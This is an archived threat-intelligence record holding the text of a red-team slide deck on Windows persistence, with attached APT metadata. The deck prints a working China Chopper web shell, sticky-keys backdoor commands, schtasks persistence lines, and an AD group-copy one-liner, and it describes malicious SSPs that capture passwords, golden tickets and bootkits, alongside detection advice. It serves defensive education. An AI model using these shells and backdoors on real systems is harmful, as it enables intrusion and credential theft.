{ "id": "13700f2b-5205-454c-9a95-0291a84ff9ea", "created_at": "2026-04-06T00:06:42.55113Z", "updated_at": "2026-04-10T03:37:58.831743Z", "deleted_at": null, "sha1_hash": "fee5f92a7120e1930157254e3b24dba1c2ea320c", "title": "Ever Present Persistence - Established Footholds Seen in the Wild", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 103438, "plain_text": "Ever Present Persistence - Established Footholds Seen in the Wild\r\nArchived: 2026-04-05 13:44:26 UTC\r\n1.\r\n2.\r\nWhoami ● Evan Pena (@evan_pena2003) ○ Mandiant’s West Coast Red Team Functional Lead ○  Open Source\r\nDeveloper ■  ADEnumerator ■  NessusCombiner ■  NMapParser, etc.\r\n3.\r\n4.\r\nWhat’s this talkabout? ● Persistence ● Persisting Networks vs. Hosts ○ The Old Ways ○ New School ● What else\r\nis needed? ○ Application ○ Privilege Levels ● Detection\r\n5.\r\n6.\r\nPersistence ● Main goal iscontinued access to a network, host, privilege level, or whatever. ● Persistence can\r\noverlap depending on your goal. E.g. persisting a host to persist a network.\r\n7.\r\n8.\r\nHost Based ● We’re lookingto have ad-hoc, or programmatically defined access to a system as close to on-demand\r\nas possible. ● All efforts in this phase are restricted to the individual system we are targeting.\r\n9.\r\nHost Based ● What dowe need to be able to do? ○ Survive Reboots – the most important aspect. ○ Compliment\r\nnetwork based persistence. ○ Foothold into sensitive systems.\r\n10.\r\nNetwork Based ● We’ve seenit used in two contexts: ○ Used to maintain access into a network ■  This is\r\nincredibly similar to host-based persistence, but could be cosidered network based for the intent it is used.\r\n11.\r\nNetwork Based ○ Used tomaintain access to different network segments. ■  Don’t want to be VLANed off in a\r\nVOIP network.\r\n12.\r\nhttp://www.slideshare.net/CTruncer/ever-present-persistence-established-footholds-seen-in-the-wild\r\nPage 1 of 10\n\nNetwork Based ● What dowe want to do here? ○ Maintain persistence into unique networks. ○ Access likely\r\nfacilitated through host- based persistence.\r\n13.\r\n14.\r\nWeb Shells ● Funny, thisalmost seems trivial and too easy that no one should use it. ○ That is not the case ■ \r\nChina Chopper - APT17, APT19, APT22 ■  ITSecShell, reDuh, ASPShell ■  Really, even just commodity code\r\n15.\r\nChina Chopper ● Very tinywebshell, about 4 kb stored server-side. ● Can be in a variety of languages (cfm, asp,\r\nphp, etc.) ● Uses a client application to interact with the webshell\r\n16.\r\nChina Chopper ServerCode ● ASPX ○  \u003c%@ Page Language=\"Jscript\"%\u003e\u003c\r\n%eval(Request.Item[\"password\"],\"unsafe\" );%\u003e ● PHP ○  \u003c?php @eval($_POST['password']);?\u003e\r\nhttps://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html\r\n17.\r\n18.\r\nChina Chopper ● Pretty awesomefeatures in it ○ File Explorer - including uploading and downloading of files,\r\nmod of timestamp ○ Database Client - mssql, mysql ○ Command Shell - normal ownage\r\n19.\r\nWeb Shell Prevention/Detection ● Huntfor known bad files ○ Hashes, other file/text-based indicators ● Blacklist\r\nall filetypes except expected files for upload functionality ● Don’t allow your web server to execute files uploaded\r\nfrom untrusted sources\r\n20.\r\nMagic Packet ●  Or,how to access port 12345 with a packet to port 443 ●  Attacker’s problem: ○  Compromised a\r\nweb server (ports 80 and 443 are occupied)\r\n21.\r\nMagic Packet ○  Firewallsprevent connections to any other port ○  Wants a TCP backdoor to be remotely\r\naccessible ■  Can’t be bothered to write a web shell\r\n22.\r\nMagic Packet -Creative Solution ●  Run backdoor, listening on 12345 ●  Run malware “low” in the network stack\r\nthat will: ○  Check incoming TCP SYN packets ○  When a SYN packet contains a specific signature, change the\r\ndestination port from 443 to 12345\r\n23.\r\nhttp://www.slideshare.net/CTruncer/ever-present-persistence-established-footholds-seen-in-the-wild\r\nPage 2 of 10\n\nMagic Packet -Creative Solution ○  Windows network stack will deliver the packet to backdoor ○  Malware alters\r\nthe port in all subsequent packets for that TCP stream\r\n24.\r\nMagic Packet –Creative Solution Syn, dport: 443 data=s3cr37Malware Syn, dport: 12345 SynAck sport: 12345\r\nSynAck sport: 443 12345 Compromised System 443\r\n25.\r\nOutlook ● Outlook rules canhelp provide a really unique way to gain access to a system. ● Silent Break wrote a\r\npost on leveraging outlook rules to gain access to a user’s system. ○ Focused on access, but can be used for\r\npersistence too :) h\"ps://silentbreaksecurity.com/malicious-outlook-rules/\r\n26.\r\nOutlook ● Create a modifiedOutlook rule to execute a binary when the trigger subject is received. ● Sync the rule\r\nagainst target user account. ● Send e-mail that triggers the rule. ● Get shell :)\r\n27.\r\n28.\r\nOutlook ● Additional tweaks ○ Have itauto-delete the e-mail when it arrives to prevent detection from the\r\nuser/victim ●  https://silentbreaksecurity.com/malicious-outlook-rules/\r\n29.\r\nOutlook ● Detection: ○ Casey Smith –Link for searching server- side rules ○ \r\nhttps://blogs.msdn.microsoft.com/canberrapfe/2012/11/05/ever-needed-to-find-server-side-outlook-rules-that-forward- mail-outside-of-your-organisation/ ○ Main IOC is a rule set to execute a binary when a certain event\r\nhappens.\r\n30.\r\n31.\r\n32.\r\nRegistry Hacks ● Probably the101 method of host based persistence. ● Really easy to setup, and can be\r\nconfigured from varying levels of permissions. ● Can be used to compliment new ways.\r\n33.\r\nRegistry Hacks ● You canconfigure it to run when the machine starts, or when a user logs into the machine. ○ \r\nHKLMSOFTWAREMicrosoftWindowsCurrentVersionRun ○ \r\nHKCUSOFTWAREMicrosoftWindowsCurrentVersionRun ● These methods are also highly publicized and are the\r\nfirst thing most defensive tools look for.\r\n34.\r\nhttp://www.slideshare.net/CTruncer/ever-present-persistence-established-footholds-seen-in-the-wild\r\nPage 3 of 10\n\nRegistry Hacks ● Can begood for helping to solidify initial access, but I wouldn’t use them for long term\r\npersistence. ○ Hopefully most teams should have the ability to detect these and therefore shouldn’t be relied on.\r\n35.\r\nStartup Folder ● Startup folderwill execute all files in the folder. ○  C:ProgramDataMicrosoftWindowsStart\r\nMenuProgramsStartup\r\n36.\r\nScheduled Tasks ● Scheduled tasksare a fairly easy way for a user of any level to persist a system. ● If you have\r\nthe proper permissions, you can schedule up to SYSTEM level tasks. ● This is Microsoft’s recommendation/\r\nalternative to stop using AT.\r\n37.\r\nScheduled Tasks ● Scheduled taskscan be created from the command line with schtasks.exe or GUI. ● These can\r\nrun on system startup, when a user logs into the system, after the system has been idle, etc. ● This can run\r\nbinaries, powershell one liners, or others.\r\n39.\r\nScheduled Tasks ● schtasks /create/tn SysUpdate /sc onidle /i 15 /tr c:userschrisdownloads safe.exe ● schtasks\r\n/create /tn WinUpdate /sc onstart /ru System /tr c: totallylegit.exe /s winsqldbsystem\r\nh\"p://blog.cobaltstrike.com/2013/11/09/schtasks-persistence-with-powershell-one-liners/\r\n40.\r\nScheduled Tasks Detection ● Geta baseline of the different tasks set to run on a system ○ schtasks /query ○ Look\r\nin the Task Scheduler ○ Scheduled task log analysis ● Periodically audit systems to identify deviations\r\n41.\r\nService Manipulation ● Services typicallyrun with SYSTEM level permissions, so they are a great candidate to\r\ntarget. ● Easiest way to install a service based persistence (if not admin) is to check for write permissions to\r\nexisting services.\r\n42.\r\n43.\r\nService Manipulation ● :) Nowthat targets have found, you need a malicious service binary. ○ Veil-Evasion,\r\nPowerUp, custom code, etc. ● Save off the original service, and then replace it with your malicious binary.\r\n● Bounce the box (if required).\r\n44.\r\nSticky Keys ● With administrativeaccess to a machine, you can easily setup sticky keys. ○ Make a copy of\r\nsethc.exe ○ Copy cmd.exe to C:windows system32sethc.exe ○ Reboot, and hit shift 5 times!\r\nhttp://www.slideshare.net/CTruncer/ever-present-persistence-established-footholds-seen-in-the-wild\r\nPage 4 of 10\n\n46.\r\nSticky Keys ● Another method,setting cmd.exe as the Debugger for sethc.exe. ○  REG ADD\r\n\"HKLMSOFTWAREMicrosoftWindows NT CurrentVersionImage File Execution Options sethc.exe\" /v Debugger\r\n/t REG_SZ /d \"C:windows system32cmd.exe\" h\"p://carnal0wnage.a\"ackresearch.com/2012/04/privilege-escalaAon-via-sAcky-keys.html? showComment=1335891005473#c7632690272609583721\r\n47.\r\nSticky Keys ● Main problem,is it doesn’t require authentication. ○ If using a shell ● So if this is used, ensure that\r\nyou use a callback that only connects to you, etc.\r\n48.\r\nSticky Keys ● Detection: ○ Compare thesethc.exe binary hash with the known good sethc.exe ○ Ensure sethc.exe\r\ndoesn’t have a debugger setup that triggers a different binary.\r\n49.\r\n50.\r\nDLL Search OrderHijack ● Search order hijacking exploits how Windows searches for dlls when loading an\r\nexecutable. ○ Specifically, it exploits the fact that Windows will search the same folder the binary is stored in for a\r\ndll first*\r\n51.\r\nDLL Search OrderHijack ● Old sample in CAPEC ○ If you drop ntshrui.dll within C:Windows and run\r\nexplorer.exe, you can get the dll within C:Windows to be executed ● This exploits the order in which the dll is\r\nsearched for on a Windows system\r\n52.\r\nDLL Search OrderHijack ● Attackers create malicious DLLs that exploit this search order to get their DLL to run\r\non a system. ● Since it’s every time the application runs, it can be used as a persistence technique. ● PowerUp can\r\nbe used to find these opportunities\r\n53.\r\nDLL Search OrderHijack ● Used by the following actors ○ APT 1, APT 8, APT 17, APT 19, APT 22, APT 26\r\n● Used by the following malware ○ AMISHARP, GH0ST, HOMEUNIX, POISON IVY, VIPER\r\n54.\r\nLegit Scheduled Tasks ● Easy to identify scheduled tasks named “evilTask” or anomalous tasks ●  First we must\r\nlook at how investigators detect malicious scheduled tasks:\r\n55.\r\nhttp://www.slideshare.net/CTruncer/ever-present-persistence-established-footholds-seen-in-the-wild\r\nPage 5 of 10\n\nLegit Scheduled Tasks ○ Stacking tasks accross multiple systems to determine anomalous tasks ○  Parse task\r\nscheduler log (schedLgu.txt)\r\n56.\r\nLegit Scheduled Tasks ● What if we modify existing legit scheduled tasks? ○  Specifically tasks that are not\r\nrequired for Windows functionality\r\n57.\r\nUnquoted Service Path ● Unquotedservice paths exploit a vulnerability in the order that Windows searches for a\r\nbinary when a space is in an unquoted path. ○ C:Program Files(x86)SteamSteam Gamingsteam.exe\r\n58.\r\nUnquoted Service Path ● C:ProgramFiles(x86)SteamSteam Gamingsteam.exe ○ C:Program.exe ○ C:Program\r\nFiles(x86)SteamSteam.exe ○ C:Program Files(x86)SteamSteam Gamingsteam.exe ● We have three opportunities\r\nhere!\r\n59.\r\nUnquoted Service Path ● Ifwe have write access to any of the paths that Windows looks for, we can hijack the\r\nservice. ○ Just need a service binary again (J) ● Drop it into any of the paths on the previous slide, and restart the\r\nservice! ○ Might have to wait for a restart\r\n60.\r\nUnquoted Service Path ● Prevention ○ Checkservice binaries on your images and determine if any are using\r\nunquoted service paths. ○ Make sure the paths aren’t writable to non-admins. ○ PowerUp can find these as well\r\n61.\r\nWMI ● Three requirements necessaryto invoke a permanent WMI event subscriber: 1. An Event Filter 2. An\r\nEvent Consumer 3. A Filter/Consumer Binding Original research performed by Matt Graeber released in\r\n“Practical Persistence with PowerShell” presentation\r\n62.\r\nEvent Filters ● The WMIquery that fires upon an event occurring - usually, an event class derived from\r\n__InstanceModificationEvent, __InstanceCreationEvent, or __InstanceDeletionEvent Original research performed\r\nby Matt Graeber released in “Practical Persistence with PowerShell” presentation\r\n63.\r\nEvent Consumers Original researchperformed by Matt Graeber released in “Practical Persistence with\r\nPowerShell” presentation ● There are five different types of Event consumers ● We’re specifically interested in\r\nthe “CommandLineEventConsumer”\r\n64.\r\nhttp://www.slideshare.net/CTruncer/ever-present-persistence-established-footholds-seen-in-the-wild\r\nPage 6 of 10\n\nFilter/Consumer Binding ● This associatesthe event filter with the event consumer Original research performed by\r\nMatt Graeber released in “Practical Persistence with PowerShell” presentation\r\n65.\r\nWMI ●  PowerSploit’s PersistenceModule for WMI ○  Automates the process ○  Will create a permanent WMI\r\nevent subscription ●  Can use Out-EncodedCommand (in PowerSploit) to get one liner\r\n66.\r\nPowerShell Profiles ● Use standardpersistence mechanism to execute PowerShell silently ○ \"C:Windows\r\nSystem32WindowsPowerShell v1.0powershell.exe\" -NonInteractive - WindowStyle Hidden ○ It’s a legit exe!\r\n67.\r\n68.\r\nPowerShell Profiles ● Anytime PowerShellexecutes, it will execute code in the default profile. ● Create profile\r\nhere ○ C:Windows System32WindowsPowerShell v1.0profile.ps1\r\n69.\r\nSecurity Support Provider ● Asecurity support provider (SSP) - like a security package ○ A user-mode secuirty\r\nextension used to perform authentication during a client/server exchange. Original research performed by Matt\r\nGraeber released at MIRcon 2014\r\n70.\r\nSecurity Support Provider ● Anauthentication package (AP) ○ Used to extend interactive login authentication\r\n○ Example: Enable RSA token authentication Original research performed by Matt Graeber released at MIRcon\r\n2014\r\n71.\r\nSecurity Support Provider ● SSP/AP ○ Canserve tasks of SSPs and APs. loaded into lsass at boot. ○ Example:\r\nKerberos and msv1_0 (NTLM) Original research performed by Matt Graeber released at MIRcon 2014\r\n72.\r\nSecurity Support Provider ● Youcan install your own SSP that will be loaded into lsass.exe. ○ No need for\r\ninjection ● Can develop your own SSP DLL ○ Required export: SpLsaModeInitialize Original research performed\r\nby Matt Graeber released at MIRcon 2014\r\n73.\r\nSecurity Support Provider ● Use Persistence.psm1 PowerSploit module to install your malcious SSP ●  Benjamin\r\nDelpy (@gentilkiwi) added SSP functionality to mimilib.dll. ○  Once installed and loaded into lsass.exe, it\r\ncaptures plaintext passwords. ○  This is acheived with the SpAcceptCredential callback function. Original research\r\nperformed by Matt Graeber released at MIRcon 2014\r\nhttp://www.slideshare.net/CTruncer/ever-present-persistence-established-footholds-seen-in-the-wild\r\nPage 7 of 10\n\n74.\r\nMalicious SSP Poc- mimilib Image taken from “Analysis of Malicious SSP” - MIRcon 2014\r\n75.\r\n76.\r\nBootkit ● A “bootkit” isa program that can alter the Master Boot Record (MBR) or Virtual Boot Record (VBR) so\r\nthat malicious code is executed before the operating system is loaded. ● Moves the original MBR to a different\r\nlocation and places itself at the beginning of the drive.\r\n77.\r\nBootkit ○ Upon boot, abootkit will modify a service to point to a modfied DLL on disk. ○ Service DLL is\r\nresponsible for executing backdoor payload.\r\n78.\r\n79.\r\nBut How DoesIt Work? ● Malcious MBR: Windows BIOS loads the modified MBR, which then loads the code in\r\nstage 2. ● Initial Loader: Loads the stage 3 code that was previously stored as a file on disk and in unallocated\r\nspace.\r\n80.\r\nBut How DoesIt Work? ● Secondary Loader: Loads code that enables the installation and configuration of\r\nbackdoor. The service hijacking phase. ● Backdoor Loader: Loads the backdoor from disk. Also the replaces\r\nhijacked service back to original form.\r\n81.\r\nBut How DoesIt Work? Simplied MBR bootkit execution taken from Mtrends 2016\r\n82.\r\nExcel Magic ●  Maliciousmacro executes backdoor ●  Ways you an ensure persistence? ○  Most people will\r\nexecute Excel at least once a day ○  So why not leverage this as a persistence technique?\r\n83.\r\nExcel Magic ○  Youcan use “old way” persistence techniques to execute Excel at startup - that is a legit program!\r\n○  Disable macro security settings so workbook executes without prompt\r\n85.\r\nExcel Magic ●  Registrymodification that executes specific Excel workbook upon Excel start ○ \r\nHKEY_CURRENT_USERSoftware MicrosoftOffice12.0ExcelSecurity Trusted Locations ○  Add location\r\n87.\r\nhttp://www.slideshare.net/CTruncer/ever-present-persistence-established-footholds-seen-in-the-wild\r\nPage 8 of 10\n\n89.\r\nGolden Ticket ● This methodcame out due to Benjamin Delpy working with Sean Metcalf. ● This forges a golden\r\nticket which can be good for 10 years! ● Golden tickets can provide on-demand domain privilege “upgrades” for\r\nany group within a domain.\r\n90.\r\nGolden Ticket ● You onlyneed four pieces of information: ○ Domain SID ○ The name of the domain ○ User you\r\nwant to create the hash for ○ krbtgt account hash ● You can build it offline, right at home\r\n91.\r\n92.\r\n93.\r\n94.\r\nGolden Ticket ● Key takeaways: ○ Ifimpersonating a real user, even if pass is changed, this still works ○ Valid for\r\nas long as you specify (10 year default) ○ Only way to stop is change krbtgt hash… twice.. Or rebuild from bare\r\nmetal :)\r\n95.\r\nAccount Checkout? ●  CaseStudy: ○  Client has account checkout system for domain administrator (DA)\r\naccounts. ○  Only two users have access to that system ○  System requires 2FA. ○  You can lose DA access if the\r\nuser changes his password, pin, or token. ○  User can see what accounts he checked out (could get caught!)\r\n96.\r\nAccount Checkout? ●  Weneed to persist domain administrator without getting caught. ○  If we keep checking out\r\naccounts with the user we have, he might see that he has accounts checked out that he didn’t check out.\r\n97.\r\n98.\r\nAccount Checkout? ●  PasswordVault permissions were managed through Active Directory Groups...TONS of\r\nthem. ○  Copy group memberships to a compromised user who doesn’t use PasswordVault ■  Note: All changes\r\nwere well documented to revert\r\n99.\r\nAccount Checkout? Get-ADUser –Identity\u003cSOURCE USERNAME\u003e -Properties memberof | Select- Object –\r\nExpandProperty memberof | Add- ADGroupMember –Members \u003cDESTINATION USERNAME\u003e\r\n100.\r\nConclusion ●  Malware persistencewill remain rampant. There will always be new and creative ways for\r\nmaintaining persistence. ●  Understanding malware persistence techniques is critical as it serves as a focal point\r\nfor incident response investigations and help drive successful remediation.\r\nhttp://www.slideshare.net/CTruncer/ever-present-persistence-established-footholds-seen-in-the-wild\r\nPage 9 of 10\n\nSource: http://www.slideshare.net/CTruncer/ever-present-persistence-established-footholds-seen-in-the-wild\r\nhttp://www.slideshare.net/CTruncer/ever-present-persistence-established-footholds-seen-in-the-wild\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY" ], "references": [ "http://www.slideshare.net/CTruncer/ever-present-persistence-established-footholds-seen-in-the-wild" ], "report_names": [ "ever-present-persistence-established-footholds-seen-in-the-wild" ], "threat_actors": [ { "id": "1f3cf3d1-4764-4158-a216-dd6352e671bb", "created_at": "2022-10-25T15:50:23.837615Z", "updated_at": "2026-04-10T02:00:05.322197Z", "deleted_at": null, "main_name": "APT19", "aliases": [ "APT19", "Codoso", "C0d0so0", "Codoso Team", "Sunshop Group" ], "source_name": "MITRE:APT19", "tools": [ "Cobalt Strike" ], "source_id": "MITRE", "reports": null }, { "id": "2150d1ac-edf0-46d4-a78a-a8899e45b2b5", "created_at": "2022-10-25T15:50:23.269339Z", "updated_at": "2026-04-10T02:00:05.402835Z", "deleted_at": null, "main_name": "APT17", "aliases": [ "APT17", "Deputy Dog" ], "source_name": "MITRE:APT17", "tools": [ "BLACKCOFFEE" ], "source_id": "MITRE", "reports": null }, { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "3fad11c6-4336-4b28-a606-f510eca5452e", "created_at": "2022-10-25T16:07:24.346573Z", "updated_at": "2026-04-10T02:00:04.948823Z", "deleted_at": null, "main_name": "Turbine Panda", "aliases": [ "APT 26", "Black Vine", "Bronze Express", "Group 13", "JerseyMikes", "KungFu Kittens", "PinkPanther", "Shell Crew", "Taffeta Typhoon", "Turbine Panda", "WebMasters" ], "source_name": "ETDA:Turbine Panda", "tools": [ "Agent.dhwf", "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "Derusbi", "Destroy RAT", "DestroyRAT", "FF-RAT", "FormerFirstRAT", "Hurix", "Kaba", "Korplug", "LOLBAS", "LOLBins", "Living off the Land", "Mivast", "PlugX", "RbDoor", "RedDelta", "RibDoor", "Sakula", "Sakula RAT", "Sakurel", "Sogu", "StreamEx", "TIGERPLUG", "TVT", "Thoper", "Winnti", "Xamtrav", "cobeacon", "ffrat" ], "source_id": "ETDA", "reports": null }, { "id": "dd583696-3de6-4c23-bfb6-e675a38a7000", "created_at": "2022-10-25T16:07:23.338398Z", "updated_at": "2026-04-10T02:00:04.548798Z", "deleted_at": null, "main_name": "APT 20", "aliases": [ "APT 20", "APT 8", "Crawling Taurus", "Operation Wocao", "TH3Bug", "Violin Panda" ], "source_name": "ETDA:APT 20", "tools": [ "Agent.dhwf", "Chymine", "Darkmoon", "Destroy RAT", "DestroyRAT", "Filesnfer", "Gen:Trojan.Heur.PT", "Kaba", "KeeThief", "Kerberoast", "Korplug", "LOLBAS", "LOLBins", "Living off the Land", "Mimikatz", "PlugX", "Poison Ivy", "ProcDump", "PsExec", "RedDelta", "SMBExec", "SPIVY", "SharpHound", "Sogu", "TIGERPLUG", "TVT", "Thoper", "WinRAR", "XServer", "Xamtrav", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null }, { "id": "7b039cc0-33b6-495a-b4ca-649d096b993d", "created_at": "2023-01-06T13:46:38.482654Z", "updated_at": "2026-04-10T02:00:02.99265Z", "deleted_at": null, "main_name": "APT22", "aliases": [ "G0039", "Suckfly", "BRONZE OLIVE", "Group 46" ], "source_name": "MISPGALAXY:APT22", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "0639667a-fb3f-43d9-a38c-6c123fd19c7f", "created_at": "2022-10-25T16:07:23.335869Z", "updated_at": "2026-04-10T02:00:04.547702Z", "deleted_at": null, "main_name": "APT 19", "aliases": [ "APT 19", "Bronze Firestone", "C0d0so0", "Checkered Typhoon", "Codoso", "Deep Panda", "G0009", "G0073", "Operation Kingslayer", "Red Pegasus", "Sunshop Group", "TG-3551" ], "source_name": "ETDA:APT 19", "tools": [ "Agentemis", "C0d0so0", "Cobalt Strike", "CobaltStrike", "Derusbi", "EmPyre", "EmpireProject", "Fire Chili", "PowerShell Empire", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "a7aefdda-98f1-4790-a32d-14cc99de2d60", "created_at": "2023-01-06T13:46:38.281844Z", "updated_at": "2026-04-10T02:00:02.909711Z", "deleted_at": null, "main_name": "APT17", "aliases": [ "BRONZE KEYSTONE", "G0025", "Group 72", "G0001", "HELIUM", "Heart Typhoon", "Group 8", "AURORA PANDA", "Hidden Lynx", "Tailgater Team" ], "source_name": "MISPGALAXY:APT17", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "46a151bd-e4c2-46f9-aee9-ee6942b01098", "created_at": "2023-01-06T13:46:38.288168Z", "updated_at": "2026-04-10T02:00:02.911919Z", "deleted_at": null, "main_name": "APT19", "aliases": [ "DEEP PANDA", "Codoso", "KungFu Kittens", "Group 13", "G0009", "G0073", "Checkered Typhoon", "Black Vine", "TEMP.Avengers", "PinkPanther", "Shell Crew", "BRONZE FIRESTONE", "Sunshop Group" ], "source_name": "MISPGALAXY:APT19", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "273a41a8-5115-4f55-865f-0960a765f18c", "created_at": "2022-10-25T16:07:24.397947Z", "updated_at": "2026-04-10T02:00:04.974605Z", "deleted_at": null, "main_name": "Wicked Spider", "aliases": [ "APT 22", "Bronze Export", "Bronze Olive", "Wicked Spider" ], "source_name": "ETDA:Wicked Spider", "tools": [ "Agent.dhwf", "AngryRebel", "Destroy RAT", "DestroyRAT", "DoublePulsar", "EternalBlue", "Farfli", "Gh0st RAT", "Ghost RAT", "Kaba", "Korplug", "Moudour", "Mydoor", "PCRat", "PlugX", "RedDelta", "Sogu", "TIGERPLUG", "TVT", "Thoper", "Xamtrav" ], "source_id": "ETDA", "reports": null }, { "id": "ee39ecf0-d311-49e5-b0ae-3e3d71f71def", "created_at": "2025-08-07T02:03:24.626625Z", "updated_at": "2026-04-10T02:00:03.605175Z", "deleted_at": null, "main_name": "BRONZE KEYSTONE", "aliases": [ "APT17 ", "Aurora Panda ", "DeputyDog ", "Group 72 ", "Hidden Lynx ", "TG-8153 ", "Tailgater Team" ], "source_name": "Secureworks:BRONZE KEYSTONE", "tools": [ "9002", "BlackCoffee", "DeputyDog", "Derusbi", "Gh0stHTTPSDropper", "HiKit", "InternalCMD", "PlugX", "PoisonIvy", "ZxShell" ], "source_id": "Secureworks", "reports": null }, { "id": "1d63fba2-f042-41ca-8a72-64c6e737d295", "created_at": "2025-08-07T02:03:24.643647Z", "updated_at": "2026-04-10T02:00:03.719558Z", "deleted_at": null, "main_name": "BRONZE OLIVE", "aliases": [ "APT22 ", "Barista", "Group 46 ", "Suckfly " ], "source_name": "Secureworks:BRONZE OLIVE", "tools": [ "Angryrebel", "DestroyRAT", "PlugX" ], "source_id": "Secureworks", "reports": null }, { "id": "f2ce5b52-a220-4b94-ab66-4b81f3fed05d", "created_at": "2025-08-07T02:03:24.595597Z", "updated_at": "2026-04-10T02:00:03.740023Z", "deleted_at": null, "main_name": "BRONZE FIRESTONE", "aliases": [ "APT19 ", "C0d0s0", "Checkered Typhoon ", "Chlorine ", "Deep Panda ", "Pupa ", "TG-3551 " ], "source_name": "Secureworks:BRONZE FIRESTONE", "tools": [ "9002", "Alice's Rabbit Hole", "Cobalt Strike", "Derusbi", "PlugX", "PoisonIvy", "PowerShell Empire", "Trojan Briba", "Zuguo" ], "source_id": "Secureworks", "reports": null }, { "id": "86fd71d3-06dc-4b73-b038-cedea7b83bac", "created_at": "2022-10-25T16:07:23.330793Z", "updated_at": "2026-04-10T02:00:04.545236Z", "deleted_at": null, "main_name": "APT 17", "aliases": [ "APT 17", "ATK 2", "Beijing Group", "Bronze Keystone", "Deputy Dog", "Elderwood", "Elderwood Gang", "G0025", "G0066", "Operation Aurora", "Operation DeputyDog", "Operation Ephemeral Hydra", "Operation RAT Cook", "SIG22", "Sneaky Panda", "TEMP.Avengers", "TG-8153", "Tailgater Team" ], "source_name": "ETDA:APT 17", "tools": [ "9002 RAT", "AGENT.ABQMR", "AGENT.AQUP.DROPPER", "AGENT.BMZA", "AGENT.GUNZ", "Agent.dhwf", "AngryRebel", "BlackCoffee", "Briba", "Chymine", "Comfoo", "Comfoo RAT", "Darkmoon", "DeputyDog", "Destroy RAT", "DestroyRAT", "Farfli", "Fexel", "Gen:Trojan.Heur.PT", "Gh0st RAT", "Ghost RAT", "Gresim", "HOMEUNIX", "HiKit", "HidraQ", "Homux", "Hydraq", "Jumpall", "Kaba", "Korplug", "Linfo", "MCRAT.A", "McRAT", "MdmBot", "Mdmbot.E", "Moudour", "Mydoor", "Naid", "Nerex", "PCRat", "PNGRAT", "Pasam", "PlugX", "Poison Ivy", "RedDelta", "Roarur", "SPIVY", "Sogu", "TIGERPLUG", "TVT", "Thoper", "Trojan.Naid", "Vasport", "Wiarp", "Xamtrav", "Zox", "ZoxPNG", "ZoxRPC", "gresim", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434002, "ts_updated_at": 1775792278, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/fee5f92a7120e1930157254e3b24dba1c2ea320c.pdf", "text": "https://archive.orkl.eu/fee5f92a7120e1930157254e3b24dba1c2ea320c.txt", "img": "https://archive.orkl.eu/fee5f92a7120e1930157254e3b24dba1c2ea320c.jpg" } }